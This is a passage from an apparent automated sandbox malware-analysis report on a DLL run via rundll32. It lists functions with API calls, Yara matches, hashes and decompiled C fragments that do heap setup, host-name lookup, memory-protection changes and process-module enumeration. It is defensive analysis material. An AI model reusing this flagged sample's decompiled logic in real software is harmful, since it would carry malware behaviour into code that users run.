                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 036D5671
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 036D56A2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Interface_ProxyQueryUnknown_
                                                          • String ID:
                                                          • API String ID: 2522245112-0
                                                          • Opcode ID: c52b5fd45c9c54f9a251df77a5f6185ad850221f2b1255e3af498e772f0f8c72
                                                          • Instruction ID: f8557bbbf2dbbe5f1ab1b6b38f61ae4b578e9df592a96030b1556ce295ac2232
                                                          • Opcode Fuzzy Hash: c52b5fd45c9c54f9a251df77a5f6185ad850221f2b1255e3af498e772f0f8c72
                                                          • Instruction Fuzzy Hash: F9214F79E01619EFCB00DBA4C888D9AF779EF89704B158688ED05DB368D771ED41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06283223 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 06283253
                                                          • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 0628329A
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                          • String ID:
                                                          • API String ID: 552344955-0
                                                          • Opcode ID: ece6722e07f66b124d85ad1dd337011fcfbbc1d012a4eb0bec60a746f24ee886
                                                          • Instruction ID: 9155cd8375adc174bbd9b79e385e68c124d708ea09a1e762dc5b4bec0fecca8d
                                                          • Opcode Fuzzy Hash: ece6722e07f66b124d85ad1dd337011fcfbbc1d012a4eb0bec60a746f24ee886
                                                          • Instruction Fuzzy Hash: 2911E971D21209AFDB51EFE9CC44B9EBBB8EF85694F204059EC0097280DB78CE01CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06289370 Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,062802F2,69B25F44,?,?,00000000), ref: 062893AD
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,062802F2), ref: 0628940E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$FileFreeHeapSystem
                                                          • String ID:
                                                          • API String ID: 892271797-0
                                                          • Opcode ID: fae5a3452f997d2baed1a700cde86a0cb0276da70b43d4c40fff99b4da3c36fc
                                                          • Instruction ID: c2975e0e273b3519ad397d43fa0a38971c88a94831ab8d3d749b24ac1210492f
                                                          • Opcode Fuzzy Hash: fae5a3452f997d2baed1a700cde86a0cb0276da70b43d4c40fff99b4da3c36fc
                                                          • Instruction Fuzzy Hash: E6111CB5D11309FFCF51EBA8ED48ADEB7FDAB48205F004062AA15E2180D774AB84DF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D1240 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 036D1267
                                                            • Part of subcall function 036D46CB: SysFreeString.OLEAUT32(?), ref: 036D47AA
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 036D12B7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$CreateDestroyFreeString
                                                          • String ID:
                                                          • API String ID: 3098518882-0
                                                          • Opcode ID: be63457552665e15f3fbc59b458b4c8fad93fc0067a346d27d2e222dc8af0463
                                                          • Instruction ID: a71c70a3ccfc6db297eaf5e45e502246e55227e05eab558588799affb3e8d73a
                                                          • Opcode Fuzzy Hash: be63457552665e15f3fbc59b458b4c8fad93fc0067a346d27d2e222dc8af0463
                                                          • Instruction Fuzzy Hash: A2118235D00209BFDB01DFA4D8049EEBBB9EF04310F008015EA00E7264E7719A258B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D14F1 Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(036D7283), ref: 036D150A
                                                            • Part of subcall function 036D46CB: SysFreeString.OLEAUT32(?), ref: 036D47AA
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D154B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 418dde13675f028928c205945cf8f4e83eff9ea8cb98f56d4090608c993a4290
                                                          • Instruction ID: d3fddb3a9e03a00c42b4e5e557662c87bf474aca3dc6228f838c9ff6b1944c66
                                                          • Opcode Fuzzy Hash: 418dde13675f028928c205945cf8f4e83eff9ea8cb98f56d4090608c993a4290
                                                          • Instruction Fuzzy Hash: EE01A276901109BFDF41DFA8E904DAF7BB8EF48710B014025F909E7224D7708A25CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D22D7 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E036D22D7(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E036D6D63(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E036D6C2C(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                          0x036d22dc
                                                          0x036d22e7
                                                          0x036d22e9
                                                          0x036d22ef
                                                          0x036d22f1
                                                          0x036d22f6
                                                          0x036d22ff
                                                          0x036d2303
                                                          0x036d230c
                                                          0x036d2310
                                                          0x036d231f
                                                          0x036d2312
                                                          0x036d2313
                                                          0x036d2318
                                                          0x036d2318
                                                          0x036d2310
                                                          0x036d2303
                                                          0x036d2328

                                                          APIs
                                                          • GetComputerNameExA.KERNEL32(00000003,00000000,036D57B5,00000000,00000000,?,75BCC740,036D57B5), ref: 036D22EF
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • GetComputerNameExA.KERNEL32(00000003,00000000,036D57B5,036D57B6,?,75BCC740,036D57B5), ref: 036D230C
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 3e61f335841c12c0a691ae62bbdca64c8dbeab569002ebe09dee9764bb7e9f03
                                                          • Instruction ID: 4b1198434ebc09a468bb3a1539ff6fa453182677c847294fa062bae4b917bc2e
                                                          • Opcode Fuzzy Hash: 3e61f335841c12c0a691ae62bbdca64c8dbeab569002ebe09dee9764bb7e9f03
                                                          • Instruction Fuzzy Hash: E0F0B476E00209BAE721D6A9DD10FAF77FCDFC5600F160059E900D7204EAB0DA0186B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D78BF Relevance: 3.0, APIs: 2, Instructions: 35stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D78BF(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E036D6D63(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x36da348; // 0x228d5a8
					_t5 = _t11 + 0x36dba70; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x36da348; // 0x228d5a8
					_t6 = _t14 + 0x36db900; // 0x6d0063
					_t16 = E036D7928(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E036D6C2C(_t20);
				}
				return _t18;
			}









                                                          0x036d78d5
                                                          0x036d78d9
                                                          0x036d7919
                                                          0x036d78db
                                                          0x036d78df
                                                          0x036d78e6
                                                          0x036d78ee
                                                          0x036d78f4
                                                          0x036d78ff
                                                          0x036d7908
                                                          0x036d790e
                                                          0x036d7910
                                                          0x036d7910
                                                          0x036d791e

                                                          APIs
                                                          • lstrlenW.KERNEL32(76CDF710,00000000,?,036D71A6,00000000,?,76CDF710,00000000,76CDF730), ref: 036D78C5
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • wsprintfW.USER32 ref: 036D78EE
                                                            • Part of subcall function 036D7928: memset.NTDLL ref: 036D794B
                                                            • Part of subcall function 036D7928: GetLastError.KERNEL32 ref: 036D7997
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                                          • String ID:
                                                          • API String ID: 1672627171-0
                                                          • Opcode ID: 184b248a5b484d71520e1239d07beba45047934858d07e77a5212415a6d5a4d3
                                                          • Instruction ID: 2249cc6dbbc775b5b5861d4032363bcc6179dddad6af993cb8333de3d0af0d95
                                                          • Opcode Fuzzy Hash: 184b248a5b484d71520e1239d07beba45047934858d07e77a5212415a6d5a4d3
                                                          • Instruction Fuzzy Hash: 46F0B437D06614ABC320EBA4EC04E5A7B9DEF88711F06441AF905DF259C771992287A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628E869 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 0628E873
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 0628E8AF
                                                            • Part of subcall function 06271A0A: lstrlen.KERNEL32(?,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977,0628893A,?,?), ref: 06271A58
                                                            • Part of subcall function 06271A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271A6A
                                                            • Part of subcall function 06271A0A: lstrcpy.KERNEL32(00000000,?), ref: 06271A79
                                                            • Part of subcall function 06271A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271A8A
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 1872894792-0
                                                          • Opcode ID: 4ec4cf9f11c583a9490a3d266f01a5986ef1a36c6b9f3eb709cd3509d074334e
                                                          • Instruction ID: e68ca16d1424e3cc977b645fa9b3742901a274ae0cc7200b75939904e7d3b44d
                                                          • Opcode Fuzzy Hash: 4ec4cf9f11c583a9490a3d266f01a5986ef1a36c6b9f3eb709cd3509d074334e
                                                          • Instruction Fuzzy Hash: 83F05C313323128F87A03F18AC8C869F758EFC8155302026AED6253300CA319C01CAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627C9A9 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0629A05C), ref: 0627C9BE
                                                            • Part of subcall function 06282331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0628235C
                                                            • Part of subcall function 06282331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 06282369
                                                            • Part of subcall function 06282331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 062823F5
                                                            • Part of subcall function 06282331: GetModuleHandleA.KERNEL32(00000000), ref: 06282400
                                                            • Part of subcall function 06282331: RtlImageNtHeader.NTDLL(00000000), ref: 06282409
                                                            • Part of subcall function 06282331: RtlExitUserThread.NTDLL(00000000), ref: 0628241E
                                                          • InterlockedDecrement.KERNEL32(0629A05C), ref: 0627C9E2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                                          • String ID:
                                                          • API String ID: 1011034841-0
                                                          • Opcode ID: 69bbdeb9aa7239f3870e82aa17f776bf902f9b5e7f07ae9cd5c04519a6c6eaa2
                                                          • Instruction ID: b1fa0e1a9c27ec10ca87ed6372885e076e7f9df08f227eb510b502102ed6ccd6
                                                          • Opcode Fuzzy Hash: 69bbdeb9aa7239f3870e82aa17f776bf902f9b5e7f07ae9cd5c04519a6c6eaa2
                                                          • Instruction Fuzzy Hash: 1FE01232778223DFDFE26A759C58F7E6651ABA5688F048614FD85F0050C630C450D6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D1CD6 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D1CD6(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x36da2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x36da1c8 = GetTickCount();
				_t5 = E036D6D78(_a4);
				if(_t5 == 0) {
					_t5 = E036D4B89(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E036D6B1C(_t9) != 0) {
							 *0x36da300 = 1; // executed
						}
						_t7 = E036D3D2C(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









                                                          0x036d1cd6
                                                          0x036d1cdf
                                                          0x036d1ce5
                                                          0x036d1cec
                                                          0x036d1cf0
                                                          0x00000000
                                                          0x036d1cf0
                                                          0x036d1cfd
                                                          0x036d1d02
                                                          0x036d1d09
                                                          0x036d1d0f
                                                          0x036d1d16
                                                          0x036d1d1f
                                                          0x036d1d21
                                                          0x036d1d21
                                                          0x036d1d2b
                                                          0x00000000
                                                          0x036d1d2b
                                                          0x036d1d16
                                                          0x036d1d30

                                                          APIs
                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,036D5E54,?), ref: 036D1CDF
                                                          • GetTickCount.KERNEL32 ref: 036D1CF3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CountCreateHeapTick
                                                          • String ID:
                                                          • API String ID: 2177101570-0
                                                          • Opcode ID: bf9bc9f01fce2010c5e797fe2d067f7150969ab6df7b509527a540a8e167ebd3
                                                          • Instruction ID: b0232a1c181c4372f104b60af2959880883e07084e6219997fa3c1e579e779df
                                                          • Opcode Fuzzy Hash: bf9bc9f01fce2010c5e797fe2d067f7150969ab6df7b509527a540a8e167ebd3
                                                          • Instruction Fuzzy Hash: 22F09B74E05302AADB60FBF1FE0571575F46F01744F145429E901D428CDBF5C4219629
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06291DED Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 062855E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0628561D
                                                            • Part of subcall function 062855E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 06285653
                                                            • Part of subcall function 062855E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0628565F
                                                            • Part of subcall function 062855E4: lstrcmpi.KERNEL32(?,00000000), ref: 0628569C
                                                            • Part of subcall function 062855E4: StrChrA.SHLWAPI(?,0000002E), ref: 062856A5
                                                            • Part of subcall function 062855E4: lstrcmpi.KERNEL32(?,00000000), ref: 062856B7
                                                            • Part of subcall function 062855E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 06285708
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,062960E0,0000002C,062890D3,06898E36,?,00000000,0628A484), ref: 06291E2C
                                                            • Part of subcall function 0628A806: GetProcAddress.KERNEL32(?,00000000), ref: 0628A82F
                                                            • Part of subcall function 0628A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,06286230,00000000,00000000,00000028,00000100), ref: 0628A851
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,062960E0,0000002C,062890D3,06898E36,?,00000000,0628A484,?,00000318), ref: 06291EB7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                                          • String ID:
                                                          • API String ID: 4138075514-0
                                                          • Opcode ID: 636a9753d89b5bb81c730d5409ca32e26c82a94ec3743070ab17f65b8bec7810
                                                          • Instruction ID: 075080f48d2ef6d67606ddffd6c14b7930cac4dd4d8d9a570d6f3219c8367c21
                                                          • Opcode Fuzzy Hash: 636a9753d89b5bb81c730d5409ca32e26c82a94ec3743070ab17f65b8bec7810
                                                          • Instruction Fuzzy Hash: 2721D571D1122AEFCF91DFA6DC84ADEBBB5BF48720F10812AE924B6250C3344951CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062918C0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,06290977,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062918D5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 1a0b23f3cec8831fc473482efbc97473b5447ffa8249c9ed164b5160c104228a
                                                          • Instruction ID: 6c478c509f745692c5e2e294a8f9eb32900ac6b8d89cec0ab0884352b10a8f9e
                                                          • Opcode Fuzzy Hash: 1a0b23f3cec8831fc473482efbc97473b5447ffa8249c9ed164b5160c104228a
                                                          • Instruction Fuzzy Hash: AC318275E20206EFEF81DF99D8889ADB7B5FBC5220B548469DB14AB250C730A950CFB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D1C03 Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E036D1C03(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x36da2d8, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                                          0x036d1c08
                                                          0x036d1c0d
                                                          0x036d1c1b
                                                          0x036d1c21
                                                          0x036d1c25
                                                          0x036d1c96
                                                          0x036d1c27
                                                          0x036d1c2b
                                                          0x036d1c2e
                                                          0x036d1c31
                                                          0x036d1c38
                                                          0x036d1c39
                                                          0x036d1c3a
                                                          0x036d1c3c
                                                          0x036d1c41
                                                          0x036d1c48
                                                          0x036d1c4e
                                                          0x036d1c4f
                                                          0x036d1c4f
                                                          0x036d1c56
                                                          0x036d1c57
                                                          0x036d1c58
                                                          0x036d1c5c
                                                          0x036d1c68
                                                          0x036d1c6e
                                                          0x036d1c6f
                                                          0x036d1c6f
                                                          0x036d1c71
                                                          0x036d1c77
                                                          0x036d1c79
                                                          0x036d1c7e
                                                          0x036d1c7f
                                                          0x036d1c7f
                                                          0x036d1c85
                                                          0x036d1c8e
                                                          0x036d1c90
                                                          0x036d1c93
                                                          0x036d1ca2

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 036D1C1B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: b4e0dc7c9a9d492bdef54caade07f8a91293275693739458c168231efc425806
                                                          • Instruction ID: ee43103cbd845a928f4e4ee4aab647aa58a770aab8031db505b7c2a633f17a2c
                                                          • Opcode Fuzzy Hash: b4e0dc7c9a9d492bdef54caade07f8a91293275693739458c168231efc425806
                                                          • Instruction Fuzzy Hash: 6E1129716853449FEB15CF29D852BE9BBA9DF53318F18508EE4409B392C2BB850BC760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06274A9F Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,062999DC,-0000000C,?,?,?,0628C01A,00000006,?,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 06274ADA
                                                            • Part of subcall function 062774AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0629A400), ref: 062774C5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleInformationModuleProcessQuery
                                                          • String ID:
                                                          • API String ID: 2776635927-0
                                                          • Opcode ID: cd304c51990325510a59fc19587624974d3a643c62f440f50f528dec7383a471
